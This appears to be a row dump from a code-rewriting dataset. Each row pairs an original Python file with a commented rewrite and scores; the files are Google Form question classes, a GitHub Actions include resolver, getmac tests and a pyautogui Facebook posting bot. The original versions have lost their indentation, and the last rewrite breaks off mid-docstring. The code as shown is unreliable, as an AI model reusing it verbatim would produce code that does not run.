pass
@abstractmethod
def get_info(self) -> Optional[bool]:
"""Obtains question metadata from Google Form."""
pass
@abstractmethod
def answer(self, *args, **kwargs) -> Optional[bool]:
"""Provide instruction to answer the question."""
pass
class AbstractOptionQuestion(ABC):
"""AbstractOptionQuestion class as ABC for custom Google Form question classes which offer options."""
# region Getter methods
@abstractmethod
def get_options(self) -> Optional[Tuple[str, ...]]:
"""Gets a list of all possible options."""
pass
@abstractmethod
def get_other_option_element(self) -> Optional[WebElement]:
"""Gets the web element for the other option input field."""
pass
# endregion Getter methods
# region Setter methods
@abstractmethod
def _set_options(self, *options: str) -> None:
"""Sets the list of options provided if it has changed."""
pass
@abstractmethod
def set_other_option_element(self, element: WebElement) -> None:
"""Sets the other option element if it has changed."""
pass
# endregion Setter methods
@abstractmethod
def _is_option(self, option: str) -> bool:
"""Check if the option is specified."""
pass
@abstractmethod
def _has_other_option(self) -> bool:
"""Check if there is an 'Other' option specified."""
pass
if __name__ == '__main__':
pass | src/questions/abstract.py | from abc import ABC, abstractmethod
from selenium.webdriver.remote.webelement import WebElement
from typing import Any, Optional, Tuple
class AbstractQuestion(ABC):
"""AbstractQuestion class as ABC for custom Google Form question classes."""
# region Getter methods
@abstractmethod
def _get_question_element(self) -> Optional[WebElement]:
"""Gets the web element which represents the entire question."""
pass
@abstractmethod
def get_header(self) -> Optional[str]:
"""Gets the question header."""
pass
@abstractmethod
def get_description(self) -> Optional[str]:
"""Gets the question description."""
pass
@abstractmethod
def is_required(self) -> Optional[bool]:
"""Checks if the question is required."""
pass
@abstractmethod
def get_answer_elements(self) -> Any:
"""Gets the web elements related to answering of the question."""
pass
# endregion Getter methods
# region Setter methods
@abstractmethod
def _set_header(self, header: str) -> None:
"""Sets the question header."""
pass
@abstractmethod
def set_question_element(self, element: WebElement) -> None:
"""Sets the web element representing the entire question if it has changed."""
pass
@abstractmethod
def set_answer_elements(self, *args, **kwargs) -> None:
"""Sets the web elements required for answering the question if it has changed."""
pass
@abstractmethod
def set_description(self, description: str) -> None:
"""Sets the question description if it has changed."""
pass
@abstractmethod
def set_required(self, required: bool) -> None:
"""Toggles the required flag if it has changed."""
pass
# endregion Setter methods
@abstractmethod
def _is_valid(self, *elements: WebElement) -> bool:
"""Check if the web element(s) is/are still valid."""
pass
@abstractmethod
def get_info(self) -> Optional[bool]:
"""Obtains question metadata from Google Form."""
pass
@abstractmethod
def answer(self, *args, **kwargs) -> Optional[bool]:
"""Provide instruction to answer the question."""
pass
class AbstractOptionQuestion(ABC):
"""AbstractOptionQuestion class as ABC for custom Google Form question classes which offer options."""
# region Getter methods
@abstractmethod
def get_options(self) -> Optional[Tuple[str, ...]]:
"""Gets a list of all possible options."""
pass
@abstractmethod
def get_other_option_element(self) -> Optional[WebElement]:
"""Gets the web element for the other option input field."""
pass
# endregion Getter methods
# region Setter methods
@abstractmethod
def _set_options(self, *options: str) -> None:
"""Sets the list of options provided if it has changed."""
pass
@abstractmethod
def set_other_option_element(self, element: WebElement) -> None:
"""Sets the other option element if it has changed."""
pass
# endregion Setter methods
@abstractmethod
def _is_option(self, option: str) -> bool:
"""Check if the option is specified."""
pass
@abstractmethod
def _has_other_option(self) -> bool:
"""Check if there is an 'Other' option specified."""
pass
if __name__ == '__main__':
pass | 0.934724 | 0.395251 |
import os.path
import pathlib
import urllib
import urllib.request
from collections import namedtuple
from .output import printerr, printdbg
"""
Functions for dealing with files that could either be local on disk or on in a
remote GitHub repository.
"""
class FilePath:
pass
_LocalFilePath = namedtuple('LocalFilePath', 'repo_root path')
class LocalFilePath(_LocalFilePath, FilePath):
def __new__(cls, repo_root, path):
if isinstance(repo_root, str):
repo_root = pathlib.Path(repo_root)
if isinstance(path, str):
path = pathlib.Path(path)
return super().__new__(cls, repo_root, path)
def __str__(self):
return os.path.join(self.repo_root, self.path)
_RemoteFilePath = namedtuple('RemoteFilePath', 'user repo ref path')
class RemoteFilePath(_RemoteFilePath, FilePath):
def __str__(self):
return '{user}/{repo}/{path}@{ref}'.format(
user=self.user, repo=self.repo, path=self.path, ref=self.ref)
def parse_remote_path(action_name):
"""Convert action name into a FilePath object."""
assert not action_name.startswith('docker://'), action_name
if '@' not in action_name:
action_name = action_name + '@main'
repo_plus_path, ref = action_name.split('@', 1)
assert '@' not in ref, action_name
if repo_plus_path.count('/') == 1:
repo_plus_path += '/'
user, repo, path = repo_plus_path.split('/', 2)
return RemoteFilePath(user, repo, ref, path)
def get_filepath(current, filepath, filetype=None):
"""
>>> localfile_current = LocalFilePath(pathlib.Path('/path'), 'abc.yaml')
>>> remotefile_current = RemoteFilePath('user', 'repo', 'ref', 'abc.yaml')
Local path on local current becomes a local path.
>>> fp = get_filepath(localfile_current, './.github/actions/blah')
>>> fp
LocalFilePath(repo_root=PosixPath('/path'), path=PosixPath('.github/actions/blah'))
>>> str(fp)
'/path/.github/actions/blah'
>>> fp = get_filepath(localfile_current, '/blah', 'action')
>>> fp
LocalFilePath(repo_root=PosixPath('/path'), path=PosixPath('.github/includes/actions/blah'))
>>> str(fp)
'/path/.github/includes/actions/blah'
>>> fp = get_filepath(localfile_current, '/blah', 'workflow')
>>> fp
LocalFilePath(repo_root=PosixPath('/path'), path=PosixPath('.github/includes/workflows/blah'))
>>> str(fp)
'/path/.github/includes/workflows/blah'
Local path on current remote gets converted to a remote path.
>>> fp = get_filepath(remotefile_current, './.github/actions/blah')
>>> fp
RemoteFilePath(user='user', repo='repo', ref='ref', path='.github/actions/blah')
>>> str(fp)
'user/repo/.github/actions/blah@ref'
>>> fp = get_filepath(remotefile_current, '/blah', 'workflow')
>>> fp
RemoteFilePath(user='user', repo='repo', ref='ref', path='.github/includes/workflows/blah')
>>> str(fp)
'user/repo/.github/includes/workflows/blah@ref'
"""
# Resolve '/$XXX' to './.github/actions/$XXX'
assert isinstance(filepath, str), (type(filepath), filepath)
if filepath.startswith('/'):
assert filetype is not None, (current, filepath, filetype)
filepath = '/'.join(
['.', '.github', 'includes', filetype+'s', filepath[1:]])
if filepath.startswith('./'):
assert '@' not in filepath, (
"Local name {} shouldn't have an @ in it".format(filepath))
# If new is local but current is remote, rewrite to a remote.
if isinstance(current, RemoteFilePath) and filepath.startswith('./'):
old_filepath = filepath
new_action = current._replace(path=filepath[2:])
filepath = '{user}/{repo}/{path}@{ref}'.format(**new_action._asdict())
printerr('Rewrite local action {} in remote repo {} to: {}'.format(
old_filepath, current, filepath))
# Local file
if filepath.startswith('./'):
assert isinstance(current, LocalFilePath), (current, filepath)
localpath = (current.repo_root / filepath[2:]).resolve()
repopath = localpath.relative_to(current.repo_root)
return current._replace(path=repopath)
# Remote file
else:
return parse_remote_path(filepath)
DOWNLOAD_CACHE = {}
def get_filepath_data(filepath):
# Get local data
if isinstance(filepath, LocalFilePath):
filename = filepath.repo_root / filepath.path
if not filename.exists():
return IOError('{} does not exist'.format(filename))
with open(filename) as f:
return f.read()
# Download remote data
elif isinstance(filepath, RemoteFilePath):
if filepath not in DOWNLOAD_CACHE:
url = 'https://raw.githubusercontent.com/{user}/{repo}/{ref}/{path}'.format(
**filepath._asdict())
printerr("Trying to download {} ..".format(url), end=' ')
try:
yaml_data = urllib.request.urlopen(url).read().decode('utf-8')
printerr('Success!')
except urllib.error.URLError as e:
yaml_data = e
printerr('Failed ({})!'.format(e))
DOWNLOAD_CACHE[filepath] = yaml_data
return DOWNLOAD_CACHE[filepath]
else:
assert False | actions_includes/files.py |
import os.path
import pathlib
import urllib
import urllib.request
from collections import namedtuple
from .output import printerr, printdbg
"""
Functions for dealing with files that could either be local on disk or on in a
remote GitHub repository.
"""
class FilePath:
pass
_LocalFilePath = namedtuple('LocalFilePath', 'repo_root path')
class LocalFilePath(_LocalFilePath, FilePath):
def __new__(cls, repo_root, path):
if isinstance(repo_root, str):
repo_root = pathlib.Path(repo_root)
if isinstance(path, str):
path = pathlib.Path(path)
return super().__new__(cls, repo_root, path)
def __str__(self):
return os.path.join(self.repo_root, self.path)
_RemoteFilePath = namedtuple('RemoteFilePath', 'user repo ref path')
class RemoteFilePath(_RemoteFilePath, FilePath):
def __str__(self):
return '{user}/{repo}/{path}@{ref}'.format(
user=self.user, repo=self.repo, path=self.path, ref=self.ref)
def parse_remote_path(action_name):
"""Convert action name into a FilePath object."""
assert not action_name.startswith('docker://'), action_name
if '@' not in action_name:
action_name = action_name + '@main'
repo_plus_path, ref = action_name.split('@', 1)
assert '@' not in ref, action_name
if repo_plus_path.count('/') == 1:
repo_plus_path += '/'
user, repo, path = repo_plus_path.split('/', 2)
return RemoteFilePath(user, repo, ref, path)
def get_filepath(current, filepath, filetype=None):
"""
>>> localfile_current = LocalFilePath(pathlib.Path('/path'), 'abc.yaml')
>>> remotefile_current = RemoteFilePath('user', 'repo', 'ref', 'abc.yaml')
Local path on local current becomes a local path.
>>> fp = get_filepath(localfile_current, './.github/actions/blah')
>>> fp
LocalFilePath(repo_root=PosixPath('/path'), path=PosixPath('.github/actions/blah'))
>>> str(fp)
'/path/.github/actions/blah'
>>> fp = get_filepath(localfile_current, '/blah', 'action')
>>> fp
LocalFilePath(repo_root=PosixPath('/path'), path=PosixPath('.github/includes/actions/blah'))
>>> str(fp)
'/path/.github/includes/actions/blah'
>>> fp = get_filepath(localfile_current, '/blah', 'workflow')
>>> fp
LocalFilePath(repo_root=PosixPath('/path'), path=PosixPath('.github/includes/workflows/blah'))
>>> str(fp)
'/path/.github/includes/workflows/blah'
Local path on current remote gets converted to a remote path.
>>> fp = get_filepath(remotefile_current, './.github/actions/blah')
>>> fp
RemoteFilePath(user='user', repo='repo', ref='ref', path='.github/actions/blah')
>>> str(fp)
'user/repo/.github/actions/blah@ref'
>>> fp = get_filepath(remotefile_current, '/blah', 'workflow')
>>> fp
RemoteFilePath(user='user', repo='repo', ref='ref', path='.github/includes/workflows/blah')
>>> str(fp)
'user/repo/.github/includes/workflows/blah@ref'
"""
# Resolve '/$XXX' to './.github/actions/$XXX'
assert isinstance(filepath, str), (type(filepath), filepath)
if filepath.startswith('/'):
assert filetype is not None, (current, filepath, filetype)
filepath = '/'.join(
['.', '.github', 'includes', filetype+'s', filepath[1:]])
if filepath.startswith('./'):
assert '@' not in filepath, (
"Local name {} shouldn't have an @ in it".format(filepath))
# If new is local but current is remote, rewrite to a remote.
if isinstance(current, RemoteFilePath) and filepath.startswith('./'):
old_filepath = filepath
new_action = current._replace(path=filepath[2:])
filepath = '{user}/{repo}/{path}@{ref}'.format(**new_action._asdict())
printerr('Rewrite local action {} in remote repo {} to: {}'.format(
old_filepath, current, filepath))
# Local file
if filepath.startswith('./'):
assert isinstance(current, LocalFilePath), (current, filepath)
localpath = (current.repo_root / filepath[2:]).resolve()
repopath = localpath.relative_to(current.repo_root)
return current._replace(path=repopath)
# Remote file
else:
return parse_remote_path(filepath)
DOWNLOAD_CACHE = {}
def get_filepath_data(filepath):
# Get local data
if isinstance(filepath, LocalFilePath):
filename = filepath.repo_root / filepath.path
if not filename.exists():
return IOError('{} does not exist'.format(filename))
with open(filename) as f:
return f.read()
# Download remote data
elif isinstance(filepath, RemoteFilePath):
if filepath not in DOWNLOAD_CACHE:
url = 'https://raw.githubusercontent.com/{user}/{repo}/{ref}/{path}'.format(
**filepath._asdict())
printerr("Trying to download {} ..".format(url), end=' ')
try:
yaml_data = urllib.request.urlopen(url).read().decode('utf-8')
printerr('Success!')
except urllib.error.URLError as e:
yaml_data = e
printerr('Failed ({})!'.format(e))
DOWNLOAD_CACHE[filepath] = yaml_data
return DOWNLOAD_CACHE[filepath]
else:
assert False | 0.517083 | 0.129183 |
# http://multivax.com/last_question.html
"""Unit and functional tests for getmac."""
import unittest
import getmac
import io
import re
from os import path
try:
from unittest import mock
except ImportError:
import mock
getmac.DEBUG = True
class MockHelper(object):
@classmethod
def load_sample(cls, filename):
filename = path.realpath('%s/../samples/%s' % (path.dirname(__file__), filename))
content = ''
with io.open(filename, 'rt', newline='') as f:
content = f.read()
return content
def __init__(self, platform_name, cmd, sample):
self.platform_name = platform_name
self.cmd = cmd
self.sample = sample
def create_side_effect(self, regex, sample):
def side_effect(params, *args, **kwargs):
output = None
retcode = 0
params = ' '.join(params) if isinstance(params, list) else params
if re.search(regex, params):
output = self.load_sample(sample)
else:
retcode = 1
process_mock = mock.Mock()
process_attrs = {
'communicate.return_value': (output, None),
'poll.return_value': retcode
}
process_mock.configure_mock(**process_attrs)
return process_mock
return side_effect
def __call__(self, func):
def func_wrapper(obj, mock_popen, mock_platform, mock_socket, *args):
if self.platform_name == 'Windows':
getmac.getmac.IS_WINDOWS = True
getmac.getmac._SYST = self.platform_name
mock_popen.side_effect = self.create_side_effect(self.cmd, self.sample)
platform_mock = mock.Mock()
platform_attrs = {
'system.return_value': self.platform_name
}
platform_mock.configure_mock(**platform_attrs)
mock_platform.return_value = platform_mock
socket_mock = mock.Mock()
mock_socket.return_value = socket_mock
func(obj)
return func_wrapper
def mock_helper(platform_name, cmd, sample):
return MockHelper(platform_name, cmd, sample)
@mock.patch('getmac.getmac.socket.socket')
@mock.patch('getmac.getmac.platform')
@mock.patch('getmac.getmac.Popen')
class TestSamples(unittest.TestCase):
# Generic samples
@mock_helper('Linux', r'ifconfig$', 'ifconfig.out')
def test_ifconfig(self):
mac = getmac.get_mac_address(interface='eth0')
self.assertEqual('74:d4:35:e9:45:71', mac)
@mock_helper('Linux', 'ip link', 'ip_link_list.out')
def test_ip_link_list(self):
mac = getmac.get_mac_address(interface='eth0')
self.assertEqual('74:d4:35:e9:45:71', mac)
# OSX samples
@mock_helper('Darwin', 'ifconfig', 'OSX/ifconfig.out')
def test_osx_ifconfig(self):
mac = getmac.get_mac_address(interface='en0')
self.assertEqual('2c:f0:ee:2f:c7:de', mac)
@mock_helper('Darwin', r'arp -a$', 'OSX/arp_-a.out')
def test_osx_arp_a(self):
mac = getmac.get_mac_address(ip='192.168.1.1')
self.assertEqual('58:6d:8f:07:c9:94', mac)
@mock_helper('Darwin', r'arp -an?$', 'OSX/arp_-an.out')
def test_osx_arp_an(self):
mac = getmac.get_mac_address(ip='192.168.1.1')
self.assertEqual('58:6d:8f:07:c9:94', mac)
# Windows samples
@mock_helper('Windows', 'getmac.exe', 'windows_10/getmac.out')
def test_windows_getmac(self):
mac = getmac.get_mac_address(interface='Ethernet 2')
self.assertEqual('74:d4:35:e9:45:71', mac)
@mock_helper('Windows', 'ipconfig.exe /all', 'windows_10/ipconfig-all.out')
def test_windows_ipconfig_all(self):
mac = getmac.get_mac_address(interface='Ethernet 3')
self.assertEqual('74:d4:35:e9:45:71', mac)
@mock_helper('Windows', 'wmic.exe nic', 'windows_10/wmic_nic.out')
def test_windows_wmic_nic(self):
mac = getmac.get_mac_address(interface='Ethernet 3')
self.assertEqual('00:ff:17:15:f8:c8', mac)
# Linux samples
@mock_helper('Linux', 'arp -a', 'ubuntu_18.04/arp_-a.out')
def test_linux_arp_a(self):
mac = getmac.get_mac_address(ip='192.168.16.2')
self.assertEqual('00:50:56:f1:4c:50', mac)
@mock_helper('Linux', 'arp -an', 'ubuntu_18.04/arp_-an.out')
def test_linux_arp_an(self):
mac = getmac.get_mac_address(ip='192.168.16.2')
self.assertEqual('00:50:56:f1:4c:50', mac)
@mock_helper('Linux', 'cat /proc/net/arp', 'ubuntu_18.04/cat_proc-net-arp.out')
def test_linux_cat_proc_net_arp(self):
mac = getmac.get_mac_address(ip='192.168.16.2')
self.assertEqual('00:50:56:f1:4c:50', mac)
@mock_helper('Linux', r'ifconfig ens33$', 'ubuntu_18.04/ifconfig_ens33.out')
def test_linux_ifconfig_ens33(self):
mac = getmac.get_mac_address(interface='ens33')
self.assertEqual('00:0c:29:b5:72:37', mac)
@mock_helper('Linux', r'ifconfig$', 'ubuntu_18.04/ifconfig.out')
def test_linux_ifconfig(self):
mac = getmac.get_mac_address(interface='ens33')
self.assertEqual('00:0c:29:b5:72:37', mac)
@mock_helper('Linux', 'ip link', 'ubuntu_18.04/ip_link_list.out')
def test_linux_ip_link_list(self):
mac = getmac.get_mac_address(interface='ens33')
self.assertEqual('00:0c:29:b5:72:37', mac)
@mock_helper('Linux', 'ip link', 'ubuntu_18.04/ip_link.out')
def test_linux_ip_link(self):
mac = getmac.get_mac_address(interface='ens33')
self.assertEqual('00:0c:29:b5:72:37', mac)
@mock_helper('Linux', r'ip neighbor show 192.168.16.2$',
'ubuntu_18.04/ip_neighbor_show_192-168-16-2.out')
def test_linux_ip_neighbor_show_192_168_16_2(self):
mac = getmac.get_mac_address(ip='192.168.16.2')
self.assertEqual('00:50:56:f1:4c:50', mac)
# Skipped: getmac has no parser for the unfiltered `ip neighbor show` form.
@unittest.skip('No parser for `ip neighbor show`')
@mock_helper('Linux', r'ip neighbor show$', 'ubuntu_18.04/ip_neighbor_show.out')
def test_linux_ip_neighbor_show(self):
    mac = getmac.get_mac_address(ip='192.168.16.2')
    self.assertEqual('00:50:56:f1:4c:50', mac)
# Parse `netstat -iae` output from Ubuntu 18.04.
@mock_helper('Linux', 'netstat -iae', 'ubuntu_18.04/netstat_iae.out')
def test_linux_netstat_iae(self):
    mac = getmac.get_mac_address(interface='ens33')
    self.assertEqual('00:0c:29:b5:72:37', mac)
class TestGetMacAddress(unittest.TestCase):
    """Functional (unmocked) tests of the public get_mac_address() API."""

    def test_get_mac_address_ip_localhost(self):
        # Loopback lookups must always resolve to something (typically 00:00:...).
        result = getmac.get_mac_address(ip='127.0.0.1')
        self.assertIsNotNone(result)
class TestFailures(unittest.TestCase):
    """Placeholder for failure-path tests.

    TODO: implement test_iface_ip (currently a stub that always passes).
    """

    def test_iface_ip(self):
        pass
class TestInternalMethods(unittest.TestCase):
    """Placeholder: tests of getmac's private helpers are not yet written."""
    pass
class TestThirdPartyPackages(unittest.TestCase):
    """Placeholder: interoperability tests with third-party packages."""
    pass
if __name__ == '__main__':
unittest.main() | tests/test_getmac.py |
# http://multivax.com/last_question.html
"""Unit and functional tests for getmac."""
import unittest
import getmac
import io
import re
from os import path
# Python 3 ships mock inside unittest; fall back to the standalone
# `mock` package on Python 2.
try:
    from unittest import mock
except ImportError:
    import mock
# Enable getmac's verbose diagnostics for all tests in this module.
getmac.DEBUG = True
class MockHelper(object):
    """Decorator that makes getmac parse a canned command-output sample.

    Used together with class-level ``mock.patch`` decorators on the test
    class: the wrapped test receives ``(mock_popen, mock_platform,
    mock_socket)`` and this helper wires them so any command matching
    ``cmd`` returns the contents of ``samples/<sample>``.
    """

    @classmethod
    def load_sample(cls, filename):
        """Return the text of ``tests/../samples/<filename>``.

        ``newline=''`` preserves the sample's original line endings so the
        parser sees exactly what the real command produced.
        """
        filename = path.realpath('%s/../samples/%s' % (path.dirname(__file__), filename))
        content = ''
        with io.open(filename, 'rt', newline='') as f:
            content = f.read()
        return content

    def __init__(self, platform_name, cmd, sample):
        self.platform_name = platform_name  # e.g. 'Linux', 'Windows', 'Darwin'
        self.cmd = cmd                      # regex matched against the command line
        self.sample = sample                # sample file served on a match

    def create_side_effect(self, regex, sample):
        """Build a Popen side effect.

        Commands matching *regex* get the sample file as stdout and
        return code 0; any other command fails with return code 1.
        """
        def side_effect(params, *args, **kwargs):
            output = None
            retcode = 0
            # Popen may receive either a list or a string command line.
            params = ' '.join(params) if isinstance(params, list) else params
            if re.search(regex, params):
                output = self.load_sample(sample)
            else:
                retcode = 1
            process_mock = mock.Mock()
            process_attrs = {
                'communicate.return_value': (output, None),
                'poll.return_value': retcode
            }
            process_mock.configure_mock(**process_attrs)
            return process_mock
        return side_effect

    def __call__(self, func):
        def func_wrapper(obj, mock_popen, mock_platform, mock_socket, *args):
            # BUGFIX: the flag used to be set only when the platform was
            # Windows, so a Windows test left IS_WINDOWS=True for every
            # later non-Windows test (order-dependent pollution).  Set it
            # explicitly for the current platform instead.
            getmac.getmac.IS_WINDOWS = (self.platform_name == 'Windows')
            getmac.getmac._SYST = self.platform_name
            mock_popen.side_effect = self.create_side_effect(self.cmd, self.sample)
            platform_mock = mock.Mock()
            platform_attrs = {
                'system.return_value': self.platform_name
            }
            platform_mock.configure_mock(**platform_attrs)
            mock_platform.return_value = platform_mock
            socket_mock = mock.Mock()
            mock_socket.return_value = socket_mock
            func(obj)
        return func_wrapper
def mock_helper(platform_name, cmd, sample):
    """Convenience factory: lowercase alias for the MockHelper decorator."""
    return MockHelper(platform_name=platform_name, cmd=cmd, sample=sample)
@mock.patch('getmac.getmac.socket.socket')
@mock.patch('getmac.getmac.platform')
@mock.patch('getmac.getmac.Popen')
class TestSamples(unittest.TestCase):
    """Data-driven parser tests.

    Each test feeds a captured command-output sample to getmac through the
    MockHelper decorator and checks the parsed MAC address.  Class-level
    mock.patch decorators are applied bottom-up, so every test method
    receives (mock_popen, mock_platform, mock_socket) — consumed by the
    MockHelper wrapper, not by the test body itself.
    """

    # Generic samples
    @mock_helper('Linux', r'ifconfig$', 'ifconfig.out')
    def test_ifconfig(self):
        mac = getmac.get_mac_address(interface='eth0')
        self.assertEqual('74:d4:35:e9:45:71', mac)

    @mock_helper('Linux', 'ip link', 'ip_link_list.out')
    def test_ip_link_list(self):
        mac = getmac.get_mac_address(interface='eth0')
        self.assertEqual('74:d4:35:e9:45:71', mac)

    # OSX samples
    @mock_helper('Darwin', 'ifconfig', 'OSX/ifconfig.out')
    def test_osx_ifconfig(self):
        mac = getmac.get_mac_address(interface='en0')
        self.assertEqual('2c:f0:ee:2f:c7:de', mac)

    @mock_helper('Darwin', r'arp -a$', 'OSX/arp_-a.out')
    def test_osx_arp_a(self):
        mac = getmac.get_mac_address(ip='192.168.1.1')
        self.assertEqual('58:6d:8f:07:c9:94', mac)

    @mock_helper('Darwin', r'arp -an?$', 'OSX/arp_-an.out')
    def test_osx_arp_an(self):
        mac = getmac.get_mac_address(ip='192.168.1.1')
        self.assertEqual('58:6d:8f:07:c9:94', mac)

    # Windows samples
    @mock_helper('Windows', 'getmac.exe', 'windows_10/getmac.out')
    def test_windows_getmac(self):
        mac = getmac.get_mac_address(interface='Ethernet 2')
        self.assertEqual('74:d4:35:e9:45:71', mac)

    @mock_helper('Windows', 'ipconfig.exe /all', 'windows_10/ipconfig-all.out')
    def test_windows_ipconfig_all(self):
        mac = getmac.get_mac_address(interface='Ethernet 3')
        self.assertEqual('74:d4:35:e9:45:71', mac)

    @mock_helper('Windows', 'wmic.exe nic', 'windows_10/wmic_nic.out')
    def test_windows_wmic_nic(self):
        mac = getmac.get_mac_address(interface='Ethernet 3')
        self.assertEqual('00:ff:17:15:f8:c8', mac)

    # Linux samples
    @mock_helper('Linux', 'arp -a', 'ubuntu_18.04/arp_-a.out')
    def test_linux_arp_a(self):
        mac = getmac.get_mac_address(ip='192.168.16.2')
        self.assertEqual('00:50:56:f1:4c:50', mac)

    @mock_helper('Linux', 'arp -an', 'ubuntu_18.04/arp_-an.out')
    def test_linux_arp_an(self):
        mac = getmac.get_mac_address(ip='192.168.16.2')
        self.assertEqual('00:50:56:f1:4c:50', mac)

    @mock_helper('Linux', 'cat /proc/net/arp', 'ubuntu_18.04/cat_proc-net-arp.out')
    def test_linux_cat_proc_net_arp(self):
        mac = getmac.get_mac_address(ip='192.168.16.2')
        self.assertEqual('00:50:56:f1:4c:50', mac)

    @mock_helper('Linux', r'ifconfig ens33$', 'ubuntu_18.04/ifconfig_ens33.out')
    def test_linux_ifconfig_ens33(self):
        mac = getmac.get_mac_address(interface='ens33')
        self.assertEqual('00:0c:29:b5:72:37', mac)

    @mock_helper('Linux', r'ifconfig$', 'ubuntu_18.04/ifconfig.out')
    def test_linux_ifconfig(self):
        mac = getmac.get_mac_address(interface='ens33')
        self.assertEqual('00:0c:29:b5:72:37', mac)

    @mock_helper('Linux', 'ip link', 'ubuntu_18.04/ip_link_list.out')
    def test_linux_ip_link_list(self):
        mac = getmac.get_mac_address(interface='ens33')
        self.assertEqual('00:0c:29:b5:72:37', mac)

    @mock_helper('Linux', 'ip link', 'ubuntu_18.04/ip_link.out')
    def test_linux_ip_link(self):
        mac = getmac.get_mac_address(interface='ens33')
        self.assertEqual('00:0c:29:b5:72:37', mac)

    @mock_helper('Linux', r'ip neighbor show 192.168.16.2$',
                 'ubuntu_18.04/ip_neighbor_show_192-168-16-2.out')
    def test_linux_ip_neighbor_show_192_168_16_2(self):
        mac = getmac.get_mac_address(ip='192.168.16.2')
        self.assertEqual('00:50:56:f1:4c:50', mac)

    # Skipped until getmac grows a parser for the unfiltered form.
    @unittest.skip('No parser for `ip neighbor show`')
    @mock_helper('Linux', r'ip neighbor show$', 'ubuntu_18.04/ip_neighbor_show.out')
    def test_linux_ip_neighbor_show(self):
        mac = getmac.get_mac_address(ip='192.168.16.2')
        self.assertEqual('00:50:56:f1:4c:50', mac)

    @mock_helper('Linux', 'netstat -iae', 'ubuntu_18.04/netstat_iae.out')
    def test_linux_netstat_iae(self):
        mac = getmac.get_mac_address(interface='ens33')
        self.assertEqual('00:0c:29:b5:72:37', mac)
class TestGetMacAddress(unittest.TestCase):
    """Functional (unmocked) tests of the public get_mac_address() API."""

    def test_get_mac_address_ip_localhost(self):
        # Loopback lookups must always resolve to something (typically 00:00:...).
        result = getmac.get_mac_address(ip='127.0.0.1')
        self.assertIsNotNone(result)
class TestFailures(unittest.TestCase):
    """Placeholder for failure-path tests.

    TODO: implement test_iface_ip (currently a stub that always passes).
    """

    def test_iface_ip(self):
        pass
class TestInternalMethods(unittest.TestCase):
    """Placeholder: tests of getmac's private helpers are not yet written."""
    pass
class TestThirdPartyPackages(unittest.TestCase):
    """Placeholder: interoperability tests with third-party packages."""
    pass
# Allow running this module directly: `python test_getmac.py`.
if __name__ == '__main__':
    unittest.main()
import pyautogui
from pyscreeze import ImageNotFoundException
import subprocess
# Improting Image class from PIL module
from PIL import Image
import helper
FACEBOOK_IMAGE_SIZE = 300
MAX_IMAGES_FACEBOOK = 2
SCROLL_LENGTH = 300
PROFILE_LOCATION_X = 200
TOTAL_TEXT_IMAGES = 3
def CheckForImageQuantity(allLocations):
if len(allLocations) > MAX_IMAGES_FACEBOOK:
print("Too many Images")
exit(1)
def LeavePage():
x, y = helper.LocateImage('./facebookImages/back.png')
if x != None and y != None:
helper.LocateAndClick('./facebookImages/back.png', helper.SMALL_PAUSE)
helper.LocateAndClick('./facebookImages/home.png', helper.SMALL_PAUSE)
def LocateAddText():
baseLocation = './facebookImages/text_'
finalLocation = ""
for i in range (1, TOTAL_TEXT_IMAGES + 1):
imageLocation = baseLocation + str(i).zfill(2) + ".png"
x, y = helper.LocateImage(imageLocation)
if x != None and y != None:
finalLocation = imageLocation
break
if finalLocation:
helper.LocateAndClick(finalLocation, helper.MEDIUM_PAUSE)
else:
print("No images match the search")
exit(1)
def GotToPage(username):
helper.LocateAndClick('./facebookImages/menu.png', helper.MEDIUM_PAUSE)
helper.LocateAndClick(username + "_facebook.png", helper.MEDIUM_PAUSE)
def post(inputJSON):
assert "text" in inputJSON
assert "type" in inputJSON
# Open Application
helper.LocateAndClick('./facebookImages/facebookLogo.png', helper.LARGE_PAUSE)
LeavePage()
GotToPage(inputJSON["user"])
# Add Image from Windows
if "images" in inputJSON:
helper.GoToImportPage()
allLocations = inputJSON["images"]
CheckForImageQuantity(allLocations)
helper.AddAllImages(allLocations)
helper.LocateAndClick('./common/home.png', helper.SMALL_PAUSE)
helper.LocateAndClick('./facebookImages/facebookLogo.png', helper.MEDIUM_PAUSE)
helper.Scroll(-100, 2)
helper.PauseForEffect(helper.SMALL_PAUSE)
# Start Post
helper.LocateAndClick('./facebookImages/create.png', helper.MEDIUM_PAUSE)
# Attach Image
if "images" in inputJSON:
helper.LocateAndClick('./facebookImages/addPhoto.png', helper.MEDIUM_PAUSE)
allImages = inputJSON["images"]
for i, image in enumerate(allImages):
helper.LocateAndClick('./facebookImages/gallery.png', helper.MEDIUM_PAUSE, adjY = FACEBOOK_IMAGE_SIZE/2, adjX = (i+1)*FACEBOOK_IMAGE_SIZE)
helper.LocateAndClick('./facebookImages/next.png', helper.MEDIUM_PAUSE)
# Add text (Always at the end, else the links can change a lot of things
LocateAddText()
pyautogui.write(inputJSON["text"], interval = 0.1)
# Tweet It Since its Ready
helper.PauseForEffect(helper.WAIT_WINDOW)
helper.LocateAndClick('./facebookImages/share.png', helper.MEDIUM_PAUSE)
if inputJSON["type"] == "feed":
helper.LocateAndClick('./facebookImages/feed.png', helper.SMALL_PAUSE)
if inputJSON["type"] == "boost":
helper.LocateAndClick('./facebookImages/boost.png', helper.SMALL_PAUSE)
helper.LocateAndClick('./facebookImages/finalShare.png', helper.LARGE_PAUSE)
helper.PauseForEffect(helper.SMALL_PAUSE)
LeavePage()
# Need to delete all the images from the Manager
# Attach Image
if "images" in inputJSON:
# Add Image from Windows
helper.GoToImportPage()
helper.LocateAndClick('./common/cancel.png', helper.SMALL_PAUSE)
CheckForImageQuantity(inputJSON["images"])
helper.DeleteAllImages(inputJSON["images"])
helper.LocateAndClick('./common/home.png', helper.SMALL_PAUSE) | climate_reality/facebookPost.py | import pyautogui
from pyscreeze import ImageNotFoundException
import subprocess
# Importing the Image class from the PIL module.
# NOTE(review): subprocess, Image and ImageNotFoundException appear unused
# in this module's visible code — confirm before removing.
from PIL import Image
import helper
# Apparent pixel size of one tile in the Facebook gallery picker; used to
# offset clicks when selecting images — TODO confirm against the app layout.
FACEBOOK_IMAGE_SIZE = 300
# Posts made by this bot carry at most this many images.
MAX_IMAGES_FACEBOOK = 2
SCROLL_LENGTH = 300
PROFILE_LOCATION_X = 200
# Number of known screenshot variants of the 'add text' button (text_01..text_03).
TOTAL_TEXT_IMAGES = 3
def CheckForImageQuantity(allLocations, max_images=None):
    """Abort the run when more images are supplied than a post may carry.

    :param allLocations: sequence of image locations to validate
    :param max_images: optional override of the limit; defaults to
